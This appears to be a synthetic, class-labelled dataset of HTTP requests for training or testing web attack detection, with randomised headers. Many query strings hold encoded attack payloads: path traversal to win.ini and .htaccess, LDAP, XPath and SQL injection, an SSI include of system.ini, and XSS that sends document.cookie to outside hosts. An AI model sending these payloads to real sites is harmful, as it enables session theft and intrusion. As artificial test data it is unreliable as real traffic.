User-Agent: sla2btmh/7.5.0
UA-CPU: StrongARM
UA-Disp: 280,070,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 458x842
Via: 7.4 189.216.107.215:71960, 5.0 www.leIg.css, FTP/8.0 www.ve3a.html:66
Transfer-Encoding: compress
Upgrade: taswen/8.6, 6o7td/4.7, soc/6.3
Warning: 565 www.9hmbio.js "egRIp9dtnpPtahcsat" 
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 14283566548757550982
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44863
Start - Id: 44851
class: PathTransversal
GET /sOWOQ6/ZRcR0pI1DL.nuc/M.BNGHeusrEX/ajSJd80sJzd61TA_0.2o/e5i/0@3EBPzsxpqNX/ehcelbtdg.png?9tobtW=iw.&tjWesombdcye=e93kASrjm&HKh1XjxFCa4=21&elcDuIJhttp.=.%2F..%2F..%2F..%2F..%2F..%2F&VG8Dmbetween1Zo=tog%3Eoo04ki%3Enode7h+Hopositionis&mbncnymp8uezShn=73fvfsp HTTP/1.0
Host: www.asse.be:260
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=3
Client-ip: 95.241.148.239
Cookie: D5bnmeI8rssIPq=k1tljheyS11vmnAr0;him=b;5rienerr31a=s3sqKNT;aowc5h2Gsisa=41278851;1snrEmFe=iQY0
Cookie2: $Version="94"
Date: Thu, 21 Jul 05 17:32:09 UTC
ETag: W/"eWSmgy4O4E8KbW15NvP"
Expect: 100-continue
From: tAozEH@Asmp.net
If-Modified-Since: Sat, 03 Mar 07 08:12:12 CET
If-Unmodified-Since: Mon, 02 Jul 07 16:23:38 CET
If-Match: "Q5@v5JMZdWxf-3Jxfy"
If-None-Match: *
If-Range: Wed, 30 Nov 05 09:04:19 GMT
Max-Forwards: 8753
MIME-Version: 3.5
Pragma: hhn=eizS
Proxy-Authorization: Basic MG5lZXNrc3Q6Zmtab3ZsczE=
Authorization: NTLM NTZSZG5tYXRkYmtpZ3RsYXVvdGZmY2FhZGllb2RsdDVkc3VpaW9IaHo=
Range: 3752-,303-8,-33345
Referer: http://www.a7t9.gov/sh2NSdii/eptfarr/giuLte/inpr6flt.jpg
TE: gzip;q=0.2,trailers
Trailer: From
User-Agent: Mozilla/7.8 (Windows; U; WinNT 6.0; xn-sj; rv:6.2.7) Gecko/90396490
UA-CPU: StrongARM
UA-Disp: 4175,8952,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 035x248
Via: 4.2 www.aaev.htm
Transfer-Encoding: deflate
Upgrade: elir/9.8, ylr/3.8, e0ge7/5.0, Son/5.8, deHi3/3.2
Warning: 141 5.122.155.98 "97dso" 
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 65016581
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 44851
Start - Id: 38775
class: LdapInjection
GET /p5xz6My1weY_/w7Eg9/hRDorjlcuiass3d/aw.asp?eO4aEzsib68n=aid&AtsprCeus=4mTt&cq=ul6d%2F+eovt5evele%7Eu&usLEartydb=8652864&ZzMd4YlQuU=bV_BVz&ratrtdEPiUhGsni=e.p7bx&ojtxh=bfn+th%27r&iye48Zebtelm=rperlsds+%7Et%7EounionE&IEurot1=13&pI.cp73=nho%29%28%26%28objectClass++++%3D++erh*%29 HTTP/1.1
Host: www.racpenia.biz:80
Connection: hXt5ii
Accept: */*;q=0.3
Accept-Charset: hz-gb-2312;q=0.8, iso-2022-jp;q=0.7, x-mac-japanese;q=0.3, cp-932
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 103.114.5.31
Cookie: eNhca=41815;ZY5divJQ@2X=teop9dgtqo
Cookie2: $Version="55"
Date: Fri, 22 Feb 08 12:32:10 CET
ETag: W/"veWm4Di8HikI9CrFgJ"
Expect: 100-continue
From: eedz@idneeachi.org
If-Modified-Since: Sat, 24 Apr 04 12:12:40 GMT
If-Unmodified-Since: Wed, 21 Oct 09 22:55:20 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 507
MIME-Version: 6.0
Pragma: tisi6t=r
Proxy-Authorization: msqj1 teTt=oUahvo
Authorization: NTLM TmFmd3RlcnpucHh4dWllY2FjZXQ1QW1pdXRmMnNveHZkaXRlYWh0OG5va25hbw==
Range: 7-
Referer: /ozldd/ai2eixn/csnieh/t9ehpEs/esdd.swf
TE: gzip
Trailer: Trailer
User-Agent: n9jAnTFf http://www.aderri.uk
UA-CPU: StrongARM
UA-Disp: 1821,609,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 343x5234
Via: 7.4 42.10.22.200, 4.7 www.oiommmts.htm, 3.9 www.n0ds9hpt.jpg
Transfer-Encoding: ciers
Upgrade: uheEfl/5.8, bsp/0.2, slh/3.9, tfor/3.1, iAr/7.5
Warning: 757 214.136.112.103 "ie6uit3rtiiPirtc" "Mon, 03 Oct 05 02:38:07 UTC"
X-Forwarded-For: 251.245.132.75
X-Serial-Number: 323337935267147
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38775
Start - Id: 37001
class: LdapInjection
GET /h2hAosa7foi/VOF12insertLCJU/TaoePntt/jxALKbpnKG/2aAVDh/iZJ/od7Z6y/sdru/ir.php3?9ols=te%29%28%26%28objectClass+++%3D+eom*%29&JTae=940421&ur=tl%277t&Aae=trrad&cgacerkdNpdeo=f5&na=s80QHwZ HTTP/1.1
Host: www.Amfa1O.biz
Connection: gdenO
Accept: image/*;q=0.8
Accept-Charset: x-mac-greek
Accept-Encoding: *;q=0.2
Accept-Language: lNn6i7-nef;q=0.4, jqtmto-hN;q=0.7, 16-xe6rnep
Cache-Control: max-age=12152
Client-ip: 134.238.253.203
Cookie: tIaorttv2sblc=xr9-rt;s8orP=191325;ar69tfrrq=t7;sab6r0hwt5hLIn=ttinsertu twuhs5;pycdataydIt=e8Le0/eoutbhns
Cookie2: $Version="554"
Date: Fri, 01 Aug 08 09:21:45 GMT
ETag: "KZmphrGa5e_XuG.bz"
Expect: 100-continue
From: nlnE@rejed1gea.uk
If-Modified-Since: Thu, 07 Aug 08 21:19:57 CET
If-Unmodified-Since: Mon, 13 Mar 06 04:50:08 GMT
If-Match: *
If-None-Match: "ZKH_-y9Yd-._F82"
If-Range: Thu, 04 Nov 04 14:20:29 GMT
Max-Forwards: 8
MIME-Version: 5.8
Pragma: ge9d='oai5l'
Proxy-Authorization: wXdaMt sohtZ=zc5ittfu
Authorization: VoiE eezne=thIO
Range: 11-,-9658
Referer: http://exei.ch/tai6vT/hyoEue.cgi
TE: gzip;q=0.1,trailers
Trailer: User-Agent
User-Agent: jgohTi
UA-CPU: PowerPC
UA-Disp: 720,086,32
UA-Color: color32
UA-Pixels: 8274x205
Via: loi/9.3 135.61.31.29, 3.4 www.cSreauo3.png, 8.1 www.eehoDnoi.tiff
Transfer-Encoding: deflate
Upgrade: roet/7.5, Xeuonr/9.7, oeer/4.8, opcsoe/4.8
Warning: 919 www.v8i3eh.html "hterlDuo" "Fri, 28 Oct 05 03:05:23 GMT"
X-Forwarded-For: 106.206.209.192
X-Serial-Number: 4092233930
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 37001
Start - Id: 45582
class: PathTransversal
GET /ziPik/47it6oomtloy/tOEvutJ1uD2P6WU/execwxpQZEYUKOT%u/iErYE7pGgP8d8/at6biluidu1eoeue.png?r9cePt94ci=85020&Ixp_sQKLCJ_=8272231&leitbtd6=P%40tnethi+hhln&ktol5rrixuoebe=+ke4en+a&eThyiut7th5eb=u%3A%5C%5CWINNT%5C%5Cwin.ini&MNxxp_g4f=bgG&lo0hk=ndw3xMrfin&jiNweln=tEt%25&ra=rthd&jid3naroHix3yee=ym&hetdEheod=316399&MauTeerloasswsx=432&C92Zk_D6servicesru=215734&fmhddnk=024832&Odsuef=I HTTP/1.1
Host: www.a9Orwc.biz:52
Connection: close
Accept: application/rtf;q=0.2, video/mpeg;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 181.101.28.152
Cookie: rnryest5s=c2(b$ tt ai0ai0ir O;luemoom4=Woetan
Cookie2: $Version="513"
Date: Wed, 18 Jul 07 05:18:24 GMT
ETag: "W@5PqyMvVxHHDy-"
Expect: 100-continue
From: wtdlbok@elsFbheed.st
If-Modified-Since: Tue, 09 Nov 04 15:23:22 GMT
If-Unmodified-Since: Thu, 29 Nov 07 16:26:04 UTC
If-Match: "V.8LK4n69-kgXicgta"
If-None-Match: *
If-Range: *
Max-Forwards: 002
MIME-Version: 2.5
Pragma: DQ='ueiti'
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: Digest response="3e092Ba963B0CA1f5a1fBABba2dDf2bE"
Range: 286-378831
Referer: /tussmle/7soep/snatysl.tar.gz
TE: chunked;q=0.3,trailers
Trailer: Transfer-Encoding
User-Agent: h6e8ua/3.0.3.5.6
UA-CPU: StrongARM
UA-Disp: 6548,353,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6460x166
Via: 0.6 230.210.43.29, HTTP/1.0 www.rssichs.htm
Transfer-Encoding: deflate
Upgrade: m9e/5.3, eSsw5l/3.4, Vct7rc/0.1, hEwtE/6.8
Warning: 987 134.153.100.236 "eesinenge5NOla6sS" 
X-Forwarded-For: 58.229.7.205
X-Serial-Number: 368281150283459
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45582
Start - Id: 47614
class: XSS
GET /hHvOghpBunngfE.nsf?dzhiierebcsn8c=%3C%21--+--+--%3E%3Cscript+%3E%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.stil.com%2Fcgi-bin%2Fsian.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++%3E%3C%21--+--+--%3E&n873=ihn&48p_o9JTzFV=masamarexp_rXmp HTTP/1.1
Host: 232.89.39.67
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 254.77.17.52
Cookie: hsiiooarr=positionx;tpcoliMSk=848;bbN1nddofTe=7nAtzt;be=defiedelete;cozan2=s|Ee%;o0of5=yl7e@TDv@E
Cookie2: $Version="47"
Date: Wed, 01 Nov 06 03:33:25 UTC
ETag: "@Xjp1ovKWikgKE4aj"
Expect: 100-continue
From: urg9ebr@loeuenugsj.fr
If-Modified-Since: Mon, 24 Nov 08 17:55:18 UTC
If-Unmodified-Since: Mon, 03 Mar 08 02:30:33 UTC
If-Match: "AlnZlixlOIErmXKEI"
If-None-Match: "Yi3fWCu-Ug1kVBXdn-H"
If-Range: Mon, 03 Jul 06 05:25:50 GMT
Max-Forwards: 602
MIME-Version: 8.3
Pragma: rqrr=aMkr8
Proxy-Authorization: 0yeere 7neifuPe=Hsrbcstt
Authorization: Basic dGVubjpha3Rl
Range: 393273-
Referer: http://www.A6aT.net/ocrort/gllpe/0joEd4n.gif
TE: chunked,trailers,trailers
Trailer: Expect
User-Agent: hAcadvpNx (tWM2qk3; dQXBbi8Uv; t7JdzzgI; iylmk4)
UA-CPU: StrongARM
UA-Disp: 722,561,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 608x141
Via: odqFet/0.8 42.129.81.157
Transfer-Encoding: identity
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 114 www.elevwen.jpg "oserePt" 
X-Forwarded-For: 19.35.93.68
X-Serial-Number: 2524902769036083814
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47614
Start - Id: 37971
class: LdapInjection
GET /nSzYKPTe.mdz-a87tLS/tLgU2JcooLUj/k.GDFGaI.ABfb5/nullInode/ugeoshOnBOsnCoiwnpT/rpnsnoyiWa4/8eec/rt/Tcdrop6.htm?mHsj=52571073&ydbvari1eis=rlusnextytaadminte&LAedHln=464&eocqsseTgugtcs=renurqulni1&JoozrEKr=34&itwmsosi=dm&iframeZffadMhtpassD.nT=ezIaILIxA7IB&eeee4i11=Ti%2F+&Ntfuhaspa7ed=kv%29%28%26%28objectClass%3D+++2ll*%29&tErmwla=gH6rjpDf&8rzeierkcm=Ii81a4ltenisi0U&oletaoaE=99742277 HTTP/1.1
Host: www.d5jb5n3.it:80
Connection: meeat
Accept: video/*, video/*;q=0.7, image/png
Accept-Charset: koi8, x-mac-chinesetrad;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=2
Client-ip: 163.204.117.84
Cookie: ifeealea7nnR=stylee
Cookie2: $Version="4"
Date: Sat, 15 Oct 05 04:08:11 UTC
ETag: W/"f@fO0MyLgdLSoe3VulIJ"
Expect: 100-continue
From: ismia@jutuoqaes.be
If-Modified-Since: Thu, 01 May 08 22:33:41 UTC
If-Unmodified-Since: Tue, 13 Jan 04 04:26:08 UTC
If-Match: "S5oSgYbyA8T8uQ7t.Md"
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: im4o0 xt8ceo3a=mTmhl
Range: -8,482604-
Referer: /amcv/hSqajsp/selEp/hooGiatt.tar
TE: gzip,deflate;q=0.1
Trailer: Warning
User-Agent: csA6te/9.9.7.8.2
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 8848x2681
Via: 4.3 125.101.210.132
Transfer-Encoding: deflate
Upgrade: ieu/6.3
Warning: 489 www.OrprSscd.gif "nuIoc" "Wed, 01 Aug 07 18:56:21 GMT"
X-Forwarded-For: 59.231.233.194
X-Serial-Number: 800649
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37971
Start - Id: 35683
class: XPathInjection
GET /pnwsbsooh8slfeRgd.swf?ODlogsGRrcpAnHp6=betweenme+cipauef5iqt&edrOn7=zK04Bddm104w&il=438757&jrud4sc1dmSHKg=22&79ewdh9y3efirae=sUXTEr1&d7neLn=Iliyprocessing-instructionW%7E&8bhan=oes%27++++or++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28+++%29%3D%28%28++++i+%2B++++j++++%2B++++k++++%2Bl++++%2B+1%29%5D++++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or+++++%27Nd%27+++%3D++++%27+Ssoa%27+++++or&SC60J_jo=oEuaa0o&gizshripbs0er=24169&aeu6=23500453&dntueieePz5=4a&imlfoQ4atgcoNY=565939068 HTTP/1.1
Host: www.tIi28.de
Connection: heilruu
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 50.131.48.51
Cookie: 4hoeoLkVeedmen=7;bfra=hrcp;rmYFFtCnWaq=nph-e;gus07tcu8=4mlvniembyme
Cookie2: $Version="635"
Date: Mon, 18 Feb 08 06:01:42 CET
ETag: W/"k1U73-zB@DVFTOX"
Expect: 100-continue
From: tgaZ6rhn@dneNoaa.uk
If-Modified-Since: Thu, 24 Apr 08 06:26:43 UTC
If-Unmodified-Since: Sat, 28 Jan 06 13:12:41 UTC
If-Match: *
If-None-Match: *
If-Range: "R5SeJnoG9zQ_y2F_PrT"
Max-Forwards: 4
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Digest username="tghlh"
Authorization: idhsq lnifmse=1stiz
Range: -82,-22
Referer: /esfn/3Trpr/Mozuh.swf
TE: chunked;q=0.2,chunked;q=0.6,trailers
Trailer: Accept-Charset
User-Agent: Ri0nAer5idl4iVy
UA-CPU: PowerPC
UA-Disp: 466,505,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2667x788
Via: 8.8 86.46.65.221, 2.3 81.113.129.190, FTP/1.3 www.td8tP.shtml:1
Transfer-Encoding: albn; mniyi=enrne
Upgrade: pnarot/3.1, 7tgym/1.5
Warning: 134 179.206.30.120 "oxtqt" "Tue, 25 Sep 07 03:29:34 CET"
X-Forwarded-For: 214.86.27.10
X-Serial-Number: 727389738621693748
----: ---------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 35683
Start - Id: 48127
class: XSS
GET /Jbr2i7szeoagttledY/Bboot.inicQY@Bxo0PA/iysaedt6cymnezhm0e/otoyletx2yefanoAT0r.pl?ywinput@.PcOt=orCxedhttpE&oiabIedcayoEM=%3Cmeta++http-equiv+%3D++%22++++refresh%22++++content+%3D++++%22+0%3Burl%3Djavascript%3A++%5Bwindow.open%28%27http%3A%2F%2F154.92.250.46%2Fat.cgi%27%2Bdocument.cookie%29%3B%5D++%22+++%3E HTTP/1.1
Host: www.rne40M.org
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tboo-igd
Cache-Control: no-transform
Client-ip: 94.244.224.171
Cookie: Lstdin1S7RPkC=tli4es
Cookie2: $Version="2"
Date: Sun, 14 Jan 07 06:38:48 UTC
ETag: "81CJYj67o6Z9p@2p45s"
Expect: 6uo4gu5
From: odallu0e@nalp.cz
If-Modified-Since: Sat, 06 Nov 04 06:27:25 GMT
If-Unmodified-Since: Fri, 28 Jul 06 24:37:01 CET
If-Match: "dVaqRqP6Gq.JiQSrMY"
If-None-Match: "GFpIDfLGzmQ9KA2wpU"
If-Range: *
Max-Forwards: 28
MIME-Version: 3.4
Pragma: eds=euro
Proxy-Authorization: Digest realm
Authorization: ehtw2 teSjse=oaotilii
Range: 2-92,159872-,109519-
Referer: http://www.trtende.st/rsteRn/esnreon.gif
TE: deflate,trailers,trailers
Trailer: User-Agent
User-Agent: d3vx0ncC http://www.hneceHei.com
UA-CPU: Sparc
UA-Disp: 121,8495,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 2048x2568
Via: FTP/4.2 www.slvia5m.js:255, HTTP/7.3 www.EnUsetna.jpg, HTTP/0.9 www.oyen.html
Transfer-Encoding: aWp4; ttoef=lbly
Upgrade: 1ld/1.5, ec6b/0.1, A7r/0.6, peeQ/2.5
Warning: 994 www.tlp8eHc.js "tnRTM0oe" "Fri, 07 Sep 07 09:29:11 CET"
X-Forwarded-For: 72.155.7.72
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48127
Start - Id: 35225
class: SqlInjection
GET /nBkP7hnbliZJc_3/aiwTnsm.cfm?dcnohepzms=%27++OR+++%27trmkxrdvet%27+++++%3E++%27S&ieoeZS=+ntpu+enAtoo&dc997fuao=E1hn&lnasiaem=9&1ro=eM1eSlinC&u04pst8tIt=jkjbpur%3D%26Tllaosd&sstodgsKyntgn=+q&lmneQsE=8evalT%24+lkise8e2sic5+%7E&ljz=hiez6&rinad57faerrs=Ralla%7EEtyaets&quf3bgsound=qel3h+tecDytHt&eaR=h9C&eatycfaSmzu=access_logasTr HTTP/1.0
Host: www.g3bs7tiqa.org
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: compress;q=0.2, identity;q=0.9
Accept-Language: *;q=0.4
Cache-Control: min-fresh=3
Client-ip: 1.129.63.171
Cookie: ne9oe=oFif0j
Cookie2: $Version="67"
Date: Fri, 01 Feb 08 03:05:31 CET
ETag: "NfOfdyVU6e@4HME"
Expect: dsSr=Keec;ibhiddns=fentrb
From: oeeetot@ecjsbsx.org
If-Modified-Since: Wed, 17 Jun 09 19:20:54 CET
If-Unmodified-Since: Mon, 15 Sep 08 20:33:26 CET
If-Match: "aoKEF5FZ3@G5fWB-"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: alkiR qetet=eoDage
Authorization: Basic MWdNbmVuaWI6aHRpb2U=
Range: -2,109-7
Referer: http://www.zlT9np.com/ioDset/ahlnite/casNyitW/thmeo/reeoit.gz
TE: chunked,chunked
Trailer: Accept-Language
User-Agent: y-HiRWi http://www.eesxta.biz
UA-CPU: Sparc
UA-Disp: 1181,695,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0990x1742
Via: 3.2 www.fEndAno.css, HTTP/9.0 221.44.80.95
Transfer-Encoding: gzip
Upgrade: doyt/0.4, bE3yw/1.4, otunr5/6.9, 62V/0.3, trd9ad/7.6
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 123.169.83.240
X-Serial-Number: 735496334921593
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35225
Start - Id: 40454
class: SSI
GET /hce2R5IkF/cacd.vEDs@H/kEnph-99Ltmp/e20q/Osvatlios7Dimn9an/@linkcBand8j/8upv/5GFM0o3VEALsbU/srhelroel2lAtfaxeeac/esshtaluyzeottdol/uEC.3.mspx?pI6o0tes4semlee=386903&hXuu0nullhwPgwt=n6b&Teyftsh1rne=3370221&2olqqea=%3C%21--++++%23include+++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++--%3E&Aed=t&id=iprtpek%3Chl HTTP/1.1
Host: www.r1Sj6.net:552
Connection: hes7
Accept: application/zip
Accept-Charset: *
Accept-Encoding: *
Accept-Language: atrrtve-pmRtbIr, esba-wasd3Ail;q=0.1, dcRq-ydsats;q=0.9, sslBkh-Peeu;q=0.4
Cache-Control: max-stale=29
Client-ip: 202.75.46.235
Cookie: Uobaonwedl=e]Musro;aNWU-Ksock_streamhxtermOG=aupdatefy6ler3S;Yv_GWMpfMdUA=ohnha 6elaTtemail;Nio1ehsfe=wt]bap;ota=ta<tg;jB1vpamytzoeo6=63661
Cookie2: $Version="535"
Date: Thu, 20 Jan 05 16:15:38 CET
ETag: "KchBV8XrMox3c7.5ro"
Expect: 100-continue
If-Modified-Since: Tue, 13 Jul 04 05:27:11 CET
If-Unmodified-Since: Fri, 06 Jun 08 19:15:22 UTC
If-Match: *
If-None-Match: *
If-Range: ".LnnLDZB4FdRb_Q3y"
Max-Forwards: 093
MIME-Version: 4.8
Pragma: zoysyl2=bstXe7Tu
Proxy-Authorization: NTLM UnJyd1JhdGRoY05tU25taHJnZUVkZWJjcHVqZHVhdGlzc2UxdGg=
Authorization: 976i M2hnh7r=rgau0st
Range: 688-12571,5864-06540,0825-1066
Referer: /lqyle.png
TE: gzip,trailers
Trailer: If-Match
User-Agent: Mozilla/2.9 (X11; U; Open BSD i386 2.3; ei-as; rv:4.1.7) Gecko/68422162
UA-CPU: 68000
UA-Disp: 0939,1824,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 025x185
Via: FTP/2.0 48.53.180.231, 2.1 www.ptea.htm, 0.6 www.4rlnar.shtml
Transfer-Encoding: compress
Upgrade: 5tNn/1.3, eSn/8.3
Warning: 218 www.tisoHb.htm "wmoeMido5" "Sun, 29 Feb 04 21:33:45 CET"
X-Forwarded-For: 231.125.197.76
X-Serial-Number: 98565372421828
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40454
Start - Id: 36365
class: PathTransversal
GET /ennebtI/_rcpdropEgpI2mailkg-8PE/eYoxsita7iRcm/Brolt/5XvhgNFOTq_UJVqpAf/7MK/eshutdownMAwuqKcopyQB/0yGbR_tTu5j.iS8mLVB/8A5le9DinputulncWHqk.html?cIsoeeeb0h=o%3A%2F.htaccess%7E HTTP/1.0
Host: www.Sptnoue9.de
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-4;q=0.4, iso-2022-jp, iso-2022-jp;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 225.122.67.50
Cookie2: $Version="09"
Date: Thu, 07 Jul 05 12:16:51 UTC
If-Modified-Since: Sat, 11 Dec 04 06:30:37 GMT
If-Unmodified-Since: Sun, 13 Nov 05 11:07:16 UTC
If-Match: "OwKsHnWAkpJ4JA7OlqHX"
If-None-Match: "y1lqHipScwAWmmXK3WN."
If-Range: "EHTH6Uo7iPx7W8RuV"
Max-Forwards: 4
Pragma: 53ixhOkg='agome'
Authorization: rraoiq yszdnbe=SEvzf
Range: -184,-23118,-675
Referer: /wooo3/i3uirdu0.tar.gz
Trailer: If-Modified-Since
User-Agent: y8esxDew/3.9.7.5
Transfer-Encoding: gzip
Warning: 827 www.ec8sfnel.jpeg "rEAhcthwet" "Wed, 03 Mar 04 14:54:08 UTC"
X-Serial-Number: 1125183
----: ----------

null

End - Id: 36365
Start - Id: 48342
class: XPathInjection
GET /8oJ1ro/oCq7bVOXl/nT/sm3irr/k_I-acmdPs0znCbJ/Vetoxasdla3/iblnti/cJpIw@K_VCbzySn-3yp/hShhEaeosie.php3?oyhagmcl=%3Ftmluit%7Coperly%2Fa+Tf&ZBgVlinclude3qLjMbetween=s6GPBb&mocha6-M.zWrVallWR=913406&Ieca2O=x1A&copyg9ot=edropm6%27mpositiond%7Eepwherehmadminef+o&ed=809999&wsVjant3Noe=54583&id4era=lndo&isktfid=ufseniotne&lde=ska8cThwilc HTTP/1.0
Host: www.arwOoern.be
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: x-mac-turkish, iso-8859-4, cp-932
Accept-Encoding: 
Accept-Language: yIto0ed8' or   1<  yi/Ga5tsa/eez/child::text()[position()=943]    or  'aDes'  ='
Cache-Control: min-fresh=4808
Client-ip: 123.230.230.119
Cookie: vyoNenetg=eunions'aw Bmr;zQX6m1t9.WstyleC=120
Date: Sun, 04 Dec 05 24:56:36 CET
Expect: 100-continue
If-Modified-Since: Tue, 04 May 10 16:16:05 UTC
If-Unmodified-Since: Fri, 07 Jan 05 10:37:29 CET
If-Match: *
If-None-Match: *
If-Range: "wHQjsgnV9cYty2xH"
Max-Forwards: 0764
Pragma: no-cache
Authorization: NTLM d3Ryb091YW5BaTVRdXR3bmVpb2dieGFucmlzZUltdHllVGNl
Range: 7571-231,462-
Referer: /naiEtaea/naeLhe5c/9ren0o.nsf
TE: chunked;q=0.8,trailers,deflate
User-Agent: sdehmA (swoab6wR; vM7EMr4; j-ahRQSJE)
UA-Pixels: 784x5970
Via: 2.5 www.tdioemb.png
Transfer-Encoding: compress
Upgrade: ihoq4/1.0, oHxar/7.4, sms/8.7, rraA/0.1, hst/1.8
Warning: 837 147.54.34.5 "IinnttmopneddCTh1s2r" "Tue, 02 Mar 10 09:48:09 CET"
X-Serial-Number: 950594600737

null

End - Id: 48342
Start - Id: 47761
class: XSS
GET /hrtwqtuiit/_6Y7k8hVG7DUe/invG/yGP8yHt/tq/crsQu4PpA/fBQ61qt/osi/uyg/xes5n2EstUagse.jpeg?i7aoNeqmo=%40iTghpstmt4irt%2Byam%25%27b&1d3Oq.0lwd8=Hd&8uIoaEIun=fdnyentopth&autoexecSN0z6Dg=301712534&ihe0lml7b7woa=40&sBetlefs=5366&jp5axj=497103&miysnhcn=08742&amh0N3HoE=%3Cdiv+style+%3D++%22+++background-image%3A+url%28javascript%3A++%5Balert%28%27t9eo%27%29%3B%5D%29%3B+++++%22++++%3E&mgrew=56&i2kheni=176565121&ici8=+at0ojscieosf&tjcnq9=am&abgitf0T=gkh0kijz&CpPX=wbzYS HTTP/1.0
Host: www.npnb.gov
Connection: keep-alive
Accept: image/*
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 87.178.32.94
Cookie: nfsaTicl3YKrnhT=gnqs9;l3=erresscdnwegroup by;fitdaD0c0h=t%;NpositionT0welA=hsebinn3]liketnEl;swzerrTssreAyq=leiss
Cookie2: $Version="9"
Date: Tue, 01 Aug 06 05:16:45 GMT
ETag: "V0Vh57R1gKYyWC."
Expect: d1Sn88md=cmr2icr;5hrwruT
From: ychumrg@eeAsehi.cz
If-Modified-Since: Tue, 05 Oct 04 20:59:43 CET
If-Unmodified-Since: Mon, 20 Oct 08 20:15:49 GMT
If-Match: "OqfaOdc4bJRDHS_xZ"
If-None-Match: "099NsL8hZESCDj@XABE4"
If-Range: Wed, 05 Apr 06 13:04:38 UTC
Max-Forwards: 68
MIME-Version: 8.0
Pragma: eath='ohntO'
Proxy-Authorization: Basic aHZpbmVkaTpodGFzbw==
Authorization: Basic b255ZnIxbDpuNWVvbg==
Range: -41921,082-
Referer: http://irTeraes.uk/mdee/hz5ptn.bin
TE: chunked,trailers
Trailer: Date
User-Agent: Mozilla/0.4 (Windows; U; WinNT 9.3; 3c-hs; rv:8.9.4) Gecko/37456732
UA-CPU: 68000
UA-Disp: 1153,3781,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2539x540
Via: 5.8 118.254.83.63, 5.8 www.ubhm.jpg
Transfer-Encoding: gzip
Upgrade: napl/9.6, u8eeko/2.8, unr/6.5, Cfe7/9.8
Warning: 123 216.249.112.222 "zvuintlrwsyt" 
X-Forwarded-For: 88.106.208.229
X-Serial-Number: 47690533150312984482
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47761
Start - Id: 48150
class: XSS
